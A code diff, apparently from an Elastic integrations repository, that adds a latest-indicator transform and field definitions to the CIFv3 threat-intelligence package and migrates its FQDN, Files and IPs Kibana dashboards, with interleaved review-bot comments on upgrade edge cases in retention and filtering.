+ description: Event timestamp.
+- name: event.module
+ type: constant_keyword
+ description: Name of the module this data is coming from.
+ value: ti_cif3
+- name: threat.feed.name
+ type: constant_keyword
+ description: Display friendly feed name
+ value: cif3
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset
+ value: ti_cif3.feed
diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/beats.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/beats.yml
new file mode 100644
index 00000000000..cb44bb29442
--- /dev/null
+++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/beats.yml
@@ -0,0 +1,12 @@
+- name: input.type
+ type: keyword
+ description: Type of Filebeat input.
+- name: log.flags
+ type: keyword
+ description: Flags for the log file.
+- name: log.offset
+ type: long
+ description: Offset of the entry in the log file.
+- name: log.file.path
+ type: keyword
+ description: Path to the log file.
diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/ecs.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/ecs.yml
new file mode 100644
index 00000000000..18abb0a68db
--- /dev/null
+++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/ecs.yml
@@ -0,0 +1,106 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: tags
+- external: ecs
+ name: related.hash
+- external: ecs
+ name: related.ip
+- external: ecs
+ name: related.hosts
+- external: ecs
+ name: event.created
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.provider
+- external: ecs
+ name: event.type
+- external: ecs
+ name: event.original
+- external: ecs
+ name: network.protocol
+- external: ecs
+ name: network.transport
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.first_seen
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.reference
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.sightings
+- external: ecs
+ name: threat.indicator.file.type
+- external: ecs
+ name: threat.indicator.file.hash.md5
+- external: ecs
+ name: threat.indicator.file.hash.sha1
+- external: ecs
+ name: threat.indicator.file.hash.sha256
+- external: ecs
+ name: threat.indicator.file.hash.sha512
+- external: ecs
+ name: threat.indicator.file.pe.imphash
+- external: ecs
+ name: threat.indicator.file.hash.ssdeep
+- name: threat.indicator.tls.client.ja3
+ level: extended
+ type: keyword
+ description: An md5 hash that identifies clients based on their TLS handshake.
+- external: ecs
+ name: threat.indicator.email.address
+- external: ecs
+ name: threat.indicator.ip
+- external: ecs
+ name: threat.indicator.url.domain
+- external: ecs
+ name: threat.indicator.url.full
+- external: ecs
+ name: threat.indicator.url.extension
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.url.path
+- external: ecs
+ name: threat.indicator.url.port
+- external: ecs
+ name: threat.indicator.url.scheme
+- external: ecs
+ name: threat.indicator.url.query
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.as.number
+- external: ecs
+ name: threat.indicator.as.organization.name
+- external: ecs
+ name: threat.indicator.marking.tlp
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.geo.location
+- external: ecs
+ name: threat.indicator.geo.country_iso_code
+- external: ecs
+ name: threat.indicator.geo.region_name
+- external: ecs
+ name: threat.indicator.geo.timezone
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: labels
diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/fields.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/fields.yml
new file mode 100644
index 00000000000..27a986f3221
--- /dev/null
+++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/fields.yml
@@ -0,0 +1,114 @@
+- name: cif3
+ type: group
+ description: Fields for CIFv3 Threat Indicators
+ fields:
+ - name: uuid
+ type: keyword
+ description: The ID of the indicator.
+ - name: indicator
+ type: keyword
+ description: >
+ The value of the indicator, for example if the type is fqdn, this would be the value.
+
+ - name: description
+ type: keyword
+ description: A description of the indicator.
+ - name: rdata
+ type: keyword
+ description: >
+ Extra text or descriptive content related to the indicator such as OS, reverse lookup, etc.
+
+ - name: reference
+ type: keyword
+ description: A reference URL with further info related to the indicator.
+ - name: itype
+ type: keyword
+ description: >
+ The indicator type, can for example be "ipv4, fqdn, email, url, sha256".
+
+ - name: tags
+ type: keyword
+ description: >
+ Comma-separated list of words describing the indicator such as "malware,exploit".
+
+ - name: confidence
+ type: float
+ description: >
+ The confidence on a scale of 0-10 that the tags appropriately contextualize the indicator.
+
+ - name: provider
+ type: keyword
+ description: The source of the indicator information.
+ - name: application
+ type: keyword
+ description: The application used by the indicator, such as telnet or ssh.
+ - name: protocol
+ type: text
+ description: The protocol used by the indicator.
+ - name: portlist
+ type: text
+ description: The port or range of ports used by the indicator.
+ - name: city
+ type: keyword
+ description: GeoIP city information.
+ - name: region
+ type: keyword
+ description: GeoIP region information.
+ - name: count
+ type: integer
+ description: >
+ The number of times the same indicator has been reported with the same metadata by the same provider.
+
+ - name: cc
+ type: keyword
+ description: Country code of GeoIP.
+ - name: location
+ type: geo_point
+ description: Lat/Long of GeoIP.
+ - name: latitude
+ type: keyword
+ description: Latitude of GeoIP.
+ - name: longitude
+ type: keyword
+ description: Longitude of GeoIP.
+ - name: timezone
+ type: text
+ description: Timezone of GeoIP.
+ - name: asn
+ type: integer
+ description: AS Number of IP.
+ - name: asn_desc
+ type: keyword
+ description: AS Number org name.
+ - name: indicator_ipv4
+ type: ip
+ description: IPv4 address.
+ - name: indicator_ipv4_mask
+ type: integer
+ description: subnet mask of IPv4 CIDR.
+ - name: indicator_ipv6
+ type: keyword
+ description: singleton IPv6 address.
+ - name: indicator_ipv6_mask
+ type: integer
+ description: subnet mask of IPv6 CIDR.
+ - name: indicator_iprange
+ type: ip_range
+ description: IPv4 or IPv6 IP Range.
+ - name: indicator_ssdeep_chunksize
+ type: integer
+ description: SSDEEP hash chunk size.
+ - name: indicator_ssdeep_chunk
+ type: text
+ description: SSDEEP hash chunk.
+ - name: indicator_ssdeep_double_chunk
+ type: text
+ description: SSDEEP hash double chunk.
+ - name: deleted_at
+ type: date
+ description: |
+ The indicator expiration timestamp.
+ - name: expiration_duration
+ type: keyword
+ description: |
+ The configured expiration duration.
diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/manifest.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/manifest.yml
new file mode 100644
index 00000000000..f5296fd0c0a
--- /dev/null
+++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/manifest.yml
@@ -0,0 +1,18 @@
+start: true
+destination_index_template:
+ settings:
+ index:
+ sort:
+ field:
+ - "@timestamp"
+ order:
+ - desc
+ mappings:
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ match_mapping_type: string
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ date_detection: false
diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/transform.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/transform.yml
new file mode 100644
index 00000000000..daad2501296
--- /dev/null
+++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/transform.yml
@@ -0,0 +1,43 @@
+# Use of "*" to use all namespaces defined.
+source:
+ index:
+ - "logs-ti_cif3.feed-*"
+ query:
+ bool:
+ must_not:
+ exists:
+ field: error.message
+# The version suffix on the dest.index should be incremented if a breaking change
+# is made to the index mapping. You must also bump the fleet_transform_version
+# for any change to this transform configuration to take effect. The old destination
+# index is not automatically deleted. We are dependent on https://github.com/elastic/package-spec/issues/523 to give
+# us that ability in order to prevent having duplicate IoC data and prevent query
+# time field type conflicts.
+dest:
+ index: "logs-ti_cif3_latest.dest_feed-1"
+ aliases:
+ - alias: "logs-ti_cif3_latest.feed"
+ move_on_creation: true
+latest:
+ unique_key:
+ - event.dataset
+ - cif3.uuid
+ - cif3.indicator
+ sort: '@timestamp'
+description: Latest Indicator data retrieved from CIFv3.
+frequency: 30s
+sync:
+ time:
+ field: event.ingested
+ # Updated to 120s because of refresh delay in Serverless. With default 60s, sometimes transform wouldn't process all documents.
+ delay: 120s
+retention_policy:
+ time:
+ field: cif3.deleted_at
+ # Delete immediately after reaching the `deleted_at` timestamp.
+ max_age: 1m
+_meta:
+ managed: true
+ # Bump this version to delete, reinstall, and restart the transform during package.
+ # Version bump is needed if there is any code change in transform.
+ fleet_transform_version: 0.1.0
diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json
index 0c579cc276a..2916000517e 100644
--- a/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json
+++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json
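Review bot: `retention_policy` only evicts destination documents whose `cif3.deleted_at` has passed, but the source pattern `logs-ti_cif3.feed-*` also matches documents ingested before this version of the pipeline, which carry no `cif3.deleted_at`; those would be copied into `logs-ti_cif3_latest.dest_feed-1` and, unless a later report for the same `unique_key` overwrites them, never expire, so the "only active indicators" guarantee stated in the README would not hold across an upgrade. The source query already has a `bool`, so the narrowest fix is to require the field there: `must:` / `exists:` / `field: cif3.deleted_at` alongside the existing `must_not`, and a sentence in the README upgrade notes would cover the remaining case. Separately, the `_meta` comment `# Bump this version to delete, reinstall, and restart the transform during package.` stops mid-sentence; presumably `during package upgrade.` was intended.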
@@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about FQDN type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -96,8 +119,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -116,7 +138,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c94400ee-a135-4a99-9693-5879d29f7aad": { "columnOrder": [ @@ -154,7 +176,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -168,8 +190,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -188,7 +209,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "09bca2c1-c599-4575-be8a-a416589c7082": { "columnOrder": [ 
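Review bot: The new negated filter on `labels.is_ioc_transform_source` relies on every source document carrying that value, but `labels.is_ioc_transform_source` is a `constant_keyword` supplied by the updated index template, so backing indices of `logs-ti_cif3.feed-*` created before the upgrade do not have it; their documents pass the negated filter and, since the dashboard's index pattern is `logs-*` and the README says the transform destination also lives under `logs-ti_cif3_latest.*`, they would be counted together with the destination until the 5-day source retention removes them. This is probably acceptable as a transient, but it is worth a line in the README's expiration section, e.g. `After upgrading, dashboards may show both pre-upgrade source documents and transformed indicators for up to 5 days.` The same filter is added to the Files (`ti_cif3-63a0e470…`) and IPs (`ti_cif3-aedada10…`) dashboards, so one note covers all three.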
@@ -247,7 +268,9 @@ } ], "layerId": "09bca2c1-c599-4575-be8a-a416589c7082", - "layerType": "data" + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 } }, "title": "", @@ -266,19 +289,17 @@ }, "panelIndex": "c2db10e8-0e7e-4199-b787-48e14bd2e2fe", "title": "Sample of Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] FQDNs", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:36.375Z", "id": "ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -290,6 +311,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "02f1732b-a981-4fba-8b27-b944f2f3c98c:indexpattern-datasource-current-indexpattern", @@ -312,9 +338,15 @@ }, { "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" + }, + { + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json index bb03146dc6d..c7d7fcac037 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json 
@@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about File type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -95,8 +118,7 @@ }, "panelIndex": "09ba3dc0-e2e2-4799-b47f-bb919bf290a1", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -119,7 +141,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "b83c382d-fab9-4e60-a632-475e221cc20c": { "columnOrder": [ @@ -156,7 +178,7 @@ } }, "title": "Unique MD5 [CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -170,8 +192,7 @@ }, "panelIndex": "4d3e11dc-c4cc-4373-bb83-3d39fe6ffa98", "title": "Unique MD5 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -194,7 +215,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "49b7070a-f1d3-46e1-a980-2f6d6d130167": { "columnOrder": [ 
@@ -231,7 +252,7 @@ } }, "title": "Unique SHA256 [CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -245,8 +266,7 @@ }, "panelIndex": "93e32abe-87e3-469e-b7e9-a7ef7dfa2cce", "title": "Unique SHA256 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -265,7 +285,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "2825d170-daeb-4a6d-9d8f-8fda4dccffcc": { "columnOrder": [ @@ -295,12 +315,15 @@ "visualization": { "accessor": "cb37ded7-9f40-418f-bfb9-6250652373d7", "layerId": "2825d170-daeb-4a6d-9d8f-8fda4dccffcc", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -314,8 +337,7 @@ }, "panelIndex": "703fd39c-9642-4c7d-93c8-056f019acf42", "title": "Unique SSDEEP [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -334,7 +356,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "ace6c894-6dac-441d-b0db-3e246db99579": { "columnOrder": [ @@ -383,15 +405,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "4c6f7061-d5e9-4c04-b9b2-39b984b06393" - ], "layerId": "ace6c894-6dac-441d-b0db-3e246db99579", "layerType": "data", "legendDisplay": "default", - "metric": "e00a1b25-655b-4541-8ce0-1f84bdb16b1e", + "legendSize": "auto", + "metrics": [ + "e00a1b25-655b-4541-8ce0-1f84bdb16b1e" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "4c6f7061-d5e9-4c04-b9b2-39b984b06393" + ] } ], "shape": "treemap" 
@@ -413,8 +438,7 @@ }, "panelIndex": "9717eae1-9937-41e7-bad1-e9ce43d06723", "title": "File Descriptions [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -437,7 +461,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "85ad73b3-3b76-49f1-ad20-6256b58918f8": { "columnOrder": [ @@ -474,7 +498,7 @@ } }, "title": "Unique SHA1 [CIFv3]", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -488,8 +512,7 @@ }, "panelIndex": "e9b6f0ad-5e6b-44da-923e-dc0d5ccfdfea", "title": "Unique SHA1 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -508,7 +531,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "331e77de-53be-48a4-8793-3fe9a23b22b1": { "columnOrder": [ @@ -538,12 +561,15 @@ "visualization": { "accessor": "428df405-7955-4c10-94c1-0791e75aed8f", "layerId": "331e77de-53be-48a4-8793-3fe9a23b22b1", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -557,8 +583,7 @@ }, "panelIndex": "cb4ca769-08b2-4570-8a30-27cff9b77093", "title": "Unique SHA512 [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -577,7 +602,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "4c3ad4e3-46af-447e-a4ce-dab516c52797": { "columnOrder": [ 
@@ -607,12 +632,15 @@ "visualization": { "accessor": "181798f7-2b90-44e1-b76a-2f17b7210690", "layerId": "4c3ad4e3-46af-447e-a4ce-dab516c52797", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -626,19 +654,17 @@ }, "panelIndex": "823f92b7-a2ff-4883-aad1-28d3652371fe", "title": "Unique IMPHASH [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] Files", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:49.019Z", "id": "ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -650,6 +676,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "4d3e11dc-c4cc-4373-bb83-3d39fe6ffa98:indexpattern-datasource-current-indexpattern", @@ -722,9 +753,15 @@ }, { "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" + }, + { + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json index 364b0bb6569..be86537c909 100644 
--- a/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-aedada10-0ab5-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about IP type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -59,6 +58,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -70,6 +91,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -109,8 +132,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -129,7 +151,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "79edd9a4-1178-4294-94df-5d4b145d0e40": { "columnOrder": [ @@ -159,12 +181,15 @@ "visualization": { "accessor": "d1ce22a5-8010-4830-8c61-e8da8c2b2d11", "layerId": "79edd9a4-1178-4294-94df-5d4b145d0e40", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false 
@@ -178,8 +203,7 @@ }, "panelIndex": "7725b9bd-df8d-491c-a518-fe00a4538ebc", "title": "Unique IPs [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -198,7 +222,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "e8210fab-252e-4357-82f5-c8fc55fe2057": { "columnOrder": [ @@ -228,12 +252,15 @@ "visualization": { "accessor": "937cc845-c2e1-412a-b419-97c9d8076bee", "layerId": "e8210fab-252e-4357-82f5-c8fc55fe2057", - "layerType": "data" + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" } }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -247,8 +274,7 @@ }, "panelIndex": "329518f4-c5f9-42b0-b396-85ffcbb8cda3", "title": "Unique ASNs [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -267,7 +293,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "864ef66d-9195-45a5-9dcd-916bcac76fd1": { "columnOrder": [ @@ -281,7 +307,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "d8bba7bc-4a82-40c3-a858-e92244ef476c": { "dataType": "number", @@ -316,15 +342,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "d8bba7bc-4a82-40c3-a858-e92244ef476c" - ], "layerId": "864ef66d-9195-45a5-9dcd-916bcac76fd1", "layerType": "data", "legendDisplay": "default", - "metric": "1c86e415-dcb9-49ae-aa85-e4c7c0ddffd7", + "legendSize": "auto", + "metrics": [ + "1c86e415-dcb9-49ae-aa85-e4c7c0ddffd7" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "d8bba7bc-4a82-40c3-a858-e92244ef476c" + ] } ], "shape": "treemap" 
@@ -346,8 +375,7 @@ }, "panelIndex": "c651f85b-26e4-481e-91ff-39267e540183", "title": "Most Prevalent ASNs [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -366,7 +394,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "b3600118-bbef-4f41-b472-c08e802518c3": { "columnOrder": [ @@ -380,7 +408,7 @@ "label": "Count of records", "operationType": "count", "scale": "ratio", - "sourceField": "Records" + "sourceField": "___records___" }, "deabebaa-8bfa-4b99-8996-5dd59ecd37ca": { "customLabel": true, @@ -424,7 +452,9 @@ } ], "layerId": "b3600118-bbef-4f41-b472-c08e802518c3", - "layerType": "data" + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 } }, "title": "", @@ -443,8 +473,7 @@ }, "panelIndex": "aea51b8a-0962-4b21-aa7e-7c599f0f45a4", "title": "Most Common Countries [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -463,7 +492,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "da912e35-7510-42a6-b546-8d10a33b6546": { "columnOrder": [ @@ -512,15 +541,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "989df1d6-f18f-4874-8601-9e7741935cc8" - ], "layerId": "da912e35-7510-42a6-b546-8d10a33b6546", "layerType": "data", "legendDisplay": "default", - "metric": "f60fc28d-e739-46a2-a0ce-1340df8f7249", + "legendSize": "auto", + "metrics": [ + "f60fc28d-e739-46a2-a0ce-1340df8f7249" + ], "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "989df1d6-f18f-4874-8601-9e7741935cc8" + ] } ], "shape": "donut" 
@@ -542,14 +574,13 @@ }, "panelIndex": "1536f4f2-41d6-4fd0-b6c4-3650a2b5f92d", "title": "Percentage of IP Type [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { "attributes": { "description": "", - "layerListJSON": "[{\"sourceDescriptor\":{\"type\":\"EMS_TMS\",\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\"},\"id\":\"3df0f38b-db9e-451e-bb01-5a27226075df\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":1,\"visible\":true,\"style\":{\"type\":\"TILE\"},\"includeInFitToBounds\":true,\"type\":\"VECTOR_TILE\"},{\"sourceDescriptor\":{\"indexPatternId\":\"logs-*\",\"geoField\":\"threat.indicator.geo.location\",\"filterByMapBounds\":true,\"scalingType\":\"MVT\",\"id\":\"13a0c980-6195-4e3e-8506-b383ab8866c2\",\"type\":\"ES_SEARCH\",\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"applyForceRefresh\":true,\"tooltipProperties\":[],\"sortField\":\"\",\"sortOrder\":\"desc\",\"topHitsSplitField\":\"\",\"topHitsSize\":1},\"id\":\"0a0a1a3e-d002-47b0-a99a-03eb965b8bc4\",\"label\":null,\"minZoom\":0,\"maxZoom\":24,\"alpha\":0.75,\"visible\":true,\"style\":{\"type\":\"VECTOR\",\"properties\":{\"icon\":{\"type\":\"STATIC\",\"op